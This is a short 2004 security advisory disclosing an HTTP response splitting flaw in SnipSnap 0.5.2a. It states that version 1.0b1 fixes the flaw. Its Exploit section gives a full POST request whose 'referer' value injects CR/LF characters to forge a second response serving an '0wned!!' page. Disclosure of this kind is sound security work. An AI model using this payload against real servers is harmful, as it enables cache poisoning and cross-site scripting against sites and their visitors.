ADVISORY: http response splitting in snipsnap
ADVISORY
Author: Maestro (me!)
Date: 14-SEP-04
Vendor: SnipSnap (www.snipsnap.org)
Product: SnipSnap 0.5.2a
Product description (from vendor website):
SnipSnap is a free and easy to install weblog and wiki tool written in Java.
Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) -
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /exec/authenticate HTTP/1.0
Host: cringe.dnsalias.com
Content-Type: application/x-www-form-urlencoded
Content-length: 197
referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%
0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d%
0a%0d%0a{html}0wned!!{/html}&cancel=cancel
(replace curly braces with lessthan and greaterthan)
Vendor status: vendor fixed in version 1.0B1. From vendor website:
Tuesday, 14. September 2004
SnipSnap 1.0b1 (uttoxeter) released
SnipSnap version 1.0b1 has just been released. This release was necessary due
to the demand to get updates from 0.5.2a and a security issue know as HTTP
response splitting found by someone called Maestro De-Seguridad.
--
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10